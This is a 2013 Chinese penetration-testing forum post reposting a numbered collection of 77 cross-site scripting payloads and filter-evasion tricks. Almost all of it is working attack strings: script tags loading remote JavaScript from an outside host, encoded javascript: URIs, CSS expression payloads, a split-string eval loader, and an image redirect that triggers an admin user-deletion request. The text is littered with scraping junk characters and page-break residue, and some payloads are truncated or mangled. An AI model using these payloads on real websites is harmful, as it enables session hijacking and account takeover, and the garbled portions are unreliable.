中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
" t' W1 k& p6 u5 R) ^+ y6 n(1)普通的XSS JavaScript注入, M1 B0 y: a& _% u2 M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># a5 D/ Z: J  B8 P: B+ c9 T; P
(2)IMG标签XSS使用JavaScript命令( t! o- R6 b* P0 U% t
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># Q0 `: {5 `& S2 S+ T7 ~
(3)IMG标签无分号无引号
: V5 \, Q6 l7 p* l) v<IMG SRC=javascript:alert(‘XSS’)>
4 [, ?- G+ W/ |0 b(4)IMG标签大小写不敏感0 }8 I& D- r' ]1 P3 V) X/ e8 m3 f
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>  B) J. R! R+ Z1 ?& {+ }) t, R
(5)HTML编码(必须有分号)
) k4 d: e* C. ^- C3 c<IMG SRC=javascript:alert(“XSS”)>5 V0 E* W; r( N: c# @4 K; t
(6)修正缺陷IMG标签' \, w0 E, ^( {
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
0 a' O, P4 ]4 K( g$ q: J) ~" V3 P# N/ ]4 j- p
7 m6 @9 }# I1 \: W; J
(7)formCharCode标签(计算器); `1 @" i, ^# Y; l0 ^6 |1 {/ @) q
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>7 Q4 y- ~0 H$ D) T: f( Z$ t
(8)UTF-8的Unicode编码(计算器)' N/ o# z& |6 D- @" ?: y
<IMG SRC=jav..省略..S')>+ W4 c' u0 G  y. J
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ r9 J" x  f! Z" r  o* P
<IMG SRC=jav..省略..S')>
( T7 _% j! ]7 t1 W6 e3 \% a5 P1 f) Q(10)十六进制编码也是没有分号(计算器)9 F* Z! Q. n7 M" v  U
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>( S# U! s! E0 P6 U
(11)嵌入式标签,将Javascript分开, _& I( E1 v6 q6 R7 u, {- s
<IMG SRC=”jav ascript:alert(‘XSS’);”>. u0 E: q, m6 `+ G
(12)嵌入式编码标签,将Javascript分开
+ U4 B$ Z9 z& W; J* h1 {<IMG SRC=”jav ascript:alert(‘XSS’);”>1 z# L) P( c  H- C! U, @; _' Y5 [
(13)嵌入式换行符
  p6 Z# g# G+ O* e2 l% N<IMG SRC=”jav ascript:alert(‘XSS’);”>" c4 v4 n( a' W' C9 b; d
(14)嵌入式回车
0 d4 z2 B; a5 ?/ u<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 n5 C* \4 w. i9 d(15)嵌入式多行注入JavaScript,这是XSS极端的例子& }5 c# n* c5 a0 I% F7 i
<IMG SRC=”javascript:alert(‘XSS‘)”>5 U: c0 B8 ~! l. W! Q; z- f
(16)解决限制字符(要求同页面)
& s" p& Q0 B- p9 ^' ]<script>z=’document.’</script>
1 J1 ^0 }$ S" K1 T! _( w0 `<script>z=z+’write(“‘</script>! u, ~% [! d% T5 d) @/ H5 Q: i
<script>z=z+’<script’</script>3 |6 e4 Q1 u- z5 u1 X
<script>z=z+’ src=ht’</script>
" @, {) _7 ~: y( N+ Q3 `. Y2 ?3 n<script>z=z+’tp://ww’</script>+ y6 G3 _4 b% }5 [. ~
<script>z=z+’w.shell’</script>! G  e& I0 O* E+ i5 D$ F2 _1 L
<script>z=z+’.net/1.’</script>
( }2 S  Q3 n* \+ W! k& v  N<script>z=z+’js></sc’</script>
8 {8 |1 @+ ?! [% p% Z2 O<script>z=z+’ript>”)’</script>$ t( Z: w' R. P
<script>eval_r(z)</script>
0 `# r0 ^# _( d- _(17)空字符12-7-1 T00LS - Powered by Discuz! Board3 o- J, }8 p  N
https://www.t00ls.net/viewthread ... table&tid=15267 2/6' Y" q& u. s0 Q" @
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out2 }) a0 r# B  L4 W: _& \
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用7 |' T$ M7 n" s1 j& ?7 ]
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
+ J' k  i) z) x3 f. K9 R& V8 F5 T" L(19)Spaces和meta前的IMG标签: X" X# a  y8 T( E/ X$ u4 D) ^
<IMG SRC=” javascript:alert(‘XSS’);”>1 Q' G# S# y' K% E: h0 \
(20)Non-alpha-non-digit XSS' l# A% i# \3 k/ e
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% b* C7 m: x7 o% S3 k: E6 L(21)Non-alpha-non-digit XSS to 2
1 w3 f# t$ \5 ?7 l6 {  Y% y, n<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>$ A8 z. W, F) A$ w- Z% |( n
(22)Non-alpha-non-digit XSS to 3
& m8 o6 g) N5 `( n1 X9 f<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& P7 V" c+ I" k: e/ R; I(23)双开括号6 Q4 U' f4 u+ _- I" u
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
& N" H  c1 I% }( D' I( ](24)无结束脚本标记(仅火狐等浏览器)1 ~4 O/ x2 ]/ b/ X! `' m1 S
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 m+ S$ u2 Y5 o  j7 K  N$ k
(25)无结束脚本标记2: _/ e8 c7 L, c  S, l1 K& Y* e2 t: }
<SCRIPT SRC=//3w.org/XSS/xss.js>5 [) `! W! W+ o  C& b2 [% U7 @
(26)半开的HTML/JavaScript XSS
5 I- c/ p4 }1 Z# f' \<IMG SRC=”javascript:alert(‘XSS’)”' ^2 r" l; H$ ]: H: r5 N4 t
(27)双开角括号  f' g" I$ w! _. ~
<iframe src=http://3w.org/XSS.html <
4 Y. L- z; a5 z' @% Q(28)无单引号 双引号 分号
& ~  X) w- G2 T0 g& h. h<SCRIPT>a=/XSS/
) j6 q3 @" H# v- l# ~4 malert(a.source)</SCRIPT>
% u1 k- |* M& W$ M0 t: R(29)换码过滤的JavaScript  ?  |( j, {+ H, U9 a( U; S, b+ q# i
\”;alert(‘XSS’);//3 P" B5 l: ]9 k# m" [2 v$ T  ~
(30)结束Title标签
. Q9 D2 E- }. k</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
* _7 i% w) i3 G$ P4 F(31)Input Image
& `6 Q& W& V% y<INPUT SRC=”javascript:alert(‘XSS’);”>0 B4 \1 g' l7 o8 e% r) J
(32)BODY Image
/ E) b- m: W) C1 ~8 h3 m  `<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
1 D7 m; d" N: `, A& ^1 m9 W(33)BODY标签0 K: K; B- B3 v1 W6 A7 f
<BODY(‘XSS’)>8 ]" z2 Q# t9 V( H7 q
(34)IMG Dynsrc
* I, |* S/ b( d<IMG DYNSRC=”javascript:alert(‘XSS’)”>
7 p) ^: _2 t; n6 r% [3 @(35)IMG Lowsrc- S" r5 [5 O! H$ L8 w
<IMG LOWSRC=”javascript:alert(‘XSS’)”>. P# V$ m3 [! B
(36)BGSOUND  Y; G+ }8 h2 t7 z/ B# a, w. {
<BGSOUND SRC=”javascript:alert(‘XSS’);”>) X2 S5 Q! U- N3 M5 W
(37)STYLE sheet
* n( r, |% l) U" Q; h) V  h<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
6 Y8 n  K& Q% {. c$ Y3 E- c(38)远程样式表4 z" R1 g3 m8 f2 R, @% [
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
6 X% Z' u$ F7 r7 g7 `(39)List-style-image(列表式)# e4 T; c3 |3 O
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS$ I0 p3 L# s: G9 L" {
(40)IMG VBscript7 ]% }$ E+ p# ~0 K: H& o# d6 Y
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 l' n! ?, e6 z; u# r8 x7 l7 f(41)META链接url( R4 L8 z$ ?! L! n. q0 |0 B& W- J) n
( s8 V" `/ j3 S5 _% h- t  z, L/ }
/ |( v3 O' a( {' Y; E+ P
<META HTTP-EQUIV=”refresh” CONTENT=”0;* n' ^: P; S. e
URL=http://;URL=javascript:alert(‘XSS’);”>
  e. v) h8 d- {" x(42)Iframe/ h# k& p/ A. y" q: n
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
4 p4 F) _$ g6 g. t) `/ f) \(43)Frame5 T9 j& y4 J5 s% l2 ]
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board6 W9 v# v! C; L  D, y! [1 q
https://www.t00ls.net/viewthread ... table&tid=15267 3/6, f5 U& J- p2 R
(44)Table
" S; j1 \; p5 y( y; d/ T<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>0 _3 l$ C! b4 R8 F% n2 ~3 r
(45)TD
' Q) z* I! T0 l) I5 L# m3 T% E<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>/ e' u! b5 r- {! G/ n# z" i" q( I
(46)DIV background-image
5 [; \& v- r, h<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>: _5 C+ M- _7 O1 V5 J) A
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-4 Y6 Y: T6 ]0 |" `0 _/ a
8&13&12288&65279)
' l  A+ H6 \8 G" ]- B& w! Z<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
* L+ S8 K- n8 Q' x(48)DIV expression
1 w7 m3 }! x; M: b" H% A  H7 I<DIV STYLE=”width: expression_r(alert(‘XSS’));”>5 u. J$ g7 B( `6 S( w: O
(49)STYLE属性分拆表达5 z% H9 }6 z. p$ w3 C
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ W! L$ D/ U4 r, C; [1 _: V(50)匿名STYLE(组成:开角号和一个字母开头)
2 `4 w* `# A8 [% P<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
0 ^7 S+ }" W3 f4 _) v; `. a(51)STYLE background-image
% c* e" W+ `. Y) ?( M( k<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
! k' I4 r: x3 I+ R& rCLASS=XSS></A>. o5 k5 b& m3 B2 ?9 `/ }
(52)IMG STYLE方式1 a1 ~, Q0 c; H% R2 V
exppression(alert(“XSS”))’>
. e  X+ g+ R9 ~+ ~(53)STYLE background
2 o" L- A* z1 B<STYLE><STYLE) t( Y% I0 o( |* ^# \
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>4 |# t8 Y5 V3 Q2 o( x* l" J
(54)BASE. o# b- g. r6 }
<BASE HREF=”javascript:alert(‘XSS’);//”>
9 |5 s* ?4 T5 `; h2 [2 n- Q(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
) K! T& |! P" `7 U6 l<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
6 C5 U, R7 P1 C9 Z(56)在flash中使用ActionScrpt可以混进你XSS的代码
* R0 y9 Q8 k# k5 |' Qa=”get”;
( c3 u% h8 M* V' mb=”URL(\”";
0 ]1 G1 n. J: D' G$ J" w) Oc=”javascript:”;
/ C* y- p9 g% a2 ~d=”alert(‘XSS’);\”)”;
  D& M( g/ k( o! veval_r(a+b+c+d);
* A+ j, d9 n& e" `; U/ }(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
$ Y; _3 _9 a( ~<HTML xmlns:xss>$ ~5 u2 R: a) g/ J5 t
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>) B) k& q* Z- Q  m& i* R
<xss:xss>XSS</xss:xss>
# F- A, q  H7 {4 u</HTML>
. j" q  @4 k* s2 A. L(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
& i7 f; j2 T  c& B+ x<SCRIPT SRC=””></SCRIPT>
; @6 F2 V7 N, }2 j. q8 d, d(59)IMG嵌入式命令,可执行任意命令- |& I0 ?5 a( U% Q& Z) a. \
<IMG SRC=”http://www.XXX.com/a.php?a=b”>1 }+ t! [2 Z) D1 j: a, u
(60)IMG嵌入式命令(a.jpg在同服务器)
* P2 f5 \* ^6 {: u; W% ~Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
7 a% Z) ]; v% R$ Z7 L(61)绕符号过滤: P- W+ r# g, A6 g0 l% d/ N; g2 Y" ?
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
; K' m( i  t9 s2 m(62)
* g" V& Y. Y) B/ |<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>, D' v$ X" Y: H4 k  R7 q6 X, h
(63)
2 q4 S% e+ y* D5 H( g1 q0 i( Y' b<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
3 I# h7 F0 i' E(64)
9 h$ U2 z6 s; M* l. Y<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>0 n' ]4 M  ~0 T$ e
(65)# F4 M' X. t& y- W
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>4 o0 [! L$ E) N5 j; i8 n0 G. h
(66)12-7-1 T00LS - Powered by Discuz! Board& {- k$ e/ d5 ]# O- _+ s. N( U( M
https://www.t00ls.net/viewthread ... table&tid=15267 4/6% U! ^; x" z! V; @0 A
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>6 ]5 g$ P" V7 O
(67)+ L4 E) Y: \& |  K: `
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>. v8 L4 z/ c3 E- F0 T
</SCRIPT>
# M" ]7 W4 X3 g! l& r$ N(68)URL绕行8 C+ U3 y0 T, d  K2 ~6 Y
<A HREF=”http://127.0.0.1/”>XSS</A>
# r' X2 ~" w( ^* i/ E(69)URL编码
/ L' h/ P/ t/ r8 P$ D, O  z' x<A HREF=”http://3w.org”>XSS</A>1 b2 p6 L$ P5 Q6 h' }2 ?% L. `" F
(70)IP十进制# ~3 |  A" \% a2 x6 W
<A HREF=”http://3232235521″>XSS</A>  F& P) s4 l/ ]" T' Q
(71)IP十六进制! B" f5 ]( [( V: R, h. v$ m6 ?
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
- D, P0 r9 z+ [* Q4 a(72)IP八进制
0 I+ p) b, z; G% j) v+ X9 ~7 v& d/ b2 K<A HREF=”http://0300.0250.0000.0001″>XSS</A>. S# |6 \  l& q! Y1 p" [
(73)混合编码
, V$ ]/ G+ N# w; ?+ A<A HREF=”h
' Y( R/ ~% ~* R+ m9 i/ Dtt p://6 6.000146.0×7.147/”">XSS</A>1 m' n. X' c8 Z; f2 h3 F7 ?
(74)节省[http:]/ Y7 a8 z( i% h" |( P* |: K2 e
<A HREF=”//www.google.com/”>XSS</A>1 \- |0 A" ]0 M4 V- |( z7 s5 k3 S. @
(75)节省[www]
4 U6 P8 I; P0 K) s9 V<A HREF=”http://google.com/”>XSS</A>
$ D* X7 I' |' D' o: C: p! U: f(76)绝对点绝对DNS
9 i3 c1 C5 y" r; H* }<A HREF=”http://www.google.com./”>XSS</A>6 z6 @: X5 P, P/ \+ m' _, T
(77)javascript链接! v% I0 ]" f0 L$ F! G8 Q$ s" m
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
& O4 ^* k$ c$ \$ _) O5 ~% Q6 A3 z
, Z2 W/ J( @8 t7 _8 g- P3 u7 D原文地址:http://fuzzexp.org/u/0day/?p=14
* Y: x/ V& Z; I7 T6 H2 V' V% ]" o. V) `: T





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2